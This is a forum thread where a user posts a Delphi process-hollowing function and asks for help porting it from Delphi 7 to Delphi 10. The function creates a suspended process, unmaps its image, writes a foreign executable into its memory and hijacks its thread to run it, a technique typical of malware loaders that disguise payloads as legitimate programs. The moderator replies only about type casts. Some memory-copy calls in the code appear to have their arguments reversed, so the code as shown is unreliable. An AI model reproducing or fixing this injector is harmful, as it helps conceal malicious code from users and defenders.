Delphi Pages Forums  

Go Back   Delphi Pages Forums > Delphi Forum > General

Lost Password?

Reply
 
Thread Tools Display Modes
  #1  
Old 04-21-2017, 09:05 PM
Luiz Eduardo Luiz Eduardo is offline
Junior Member
 
Join Date: May 2014
Posts: 29
Question Delphi 7 to Delphi 10: Execute image of a executable (.res file) in target process.

I have this code below that works in Delphi 7, but when i try compile with Delphi 10 comes some errors.

Code:
function NtUnmapViewOfSection(ProcessHandle: THandle;
      BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll' name 'NtUnmapViewOfSection';

    function InjectPointerExe(ProcFileName, CmdLine: PChar; bFile: Pointer): Boolean;
    var
      IDH:        TImageDosHeader;
      INH:        TImageNtHeaders;
      ISH:        TImageSectionHeader;
      PI:         TProcessInformation;
      SI:         TStartUpInfo;
      CONT:       TContext;
      ImageBase:  Pointer;
      Ret:        DWORD;
      i:          integer;
      Addr:       DWORD;
      dOffset:    DWORD;
      Size: int64;
    begin
      Result := false;

      try
        FillChar(SI, SizeOf(TStartupInfo),0);
        FillChar(PI, SizeOf(TProcessInformation),0);
        FillChar(CONT, SizeOf(TContext), 0);
        SI.cb := SizeOf(TStartupInfo);
        CONT.ContextFlags := CONTEXT_FULL;
        Move(@IDH, pointer(integer(bFile)), 64);
        Move(@INH, pointer(integer(bFile) + IDH._lfanew), 248);
        CreateProcess(ProcFileName, CmdLine, nil, nil, FALSE, $00000004, nil, nil, SI, PI);

        Sleep(200);
        GetThreadContext(PI.hThread, CONT);
        ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
        NtUnmapViewOfSection(PI.hProcess, @Addr);
        ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, $2000 or $1000, 4);
        WriteProcessMemory(PI.hProcess, ImageBase, pointer(integer(bFile)), INH.OptionalHeader.SizeOfHeaders, Ret);
        dOffset := IDH._lfanew + 248;

        for i := 0 to INH.FileHeader.NumberOfSections - 1 do
        begin
          Move(@ISH, pointer(integer(bFile) + dOffset + (i * 40)), 40);
          WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), pointer(integer(bFile) + ISH.PointerToRawData), ISH.SizeOfRawData, Ret);
          VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, $40, @Addr);
        end;

        Result := WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
        CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;

        if Result = True then
        begin
          Result := SetThreadContext(PI.hThread, CONT);
          ResumeThread(PI.hThread);
        end;
      except
        CloseHandle(PI.hProcess);
        CloseHandle(PI.hThread);
        Result := false;
      end;
    end;


How solve?

Thank you very much.
Reply With Quote
  #2  
Old 04-24-2017, 09:55 AM
Norrit Norrit is offline
Moderator
 
Join Date: Aug 2001
Location: Landgraaf
Posts: 7,198
Default

Why you cast a Pointer to integer and back to pointer again?

I actually doubt if this works in D7 (in this case I just believe you), as for the Pointer to integer to pointer cast. Your error states it expects a variable (in-out), and this should be the same in your D7 implementation...
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On

Forum Jump


All times are GMT. The time now is 05:13 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2017, vBulletin Solutions, Inc.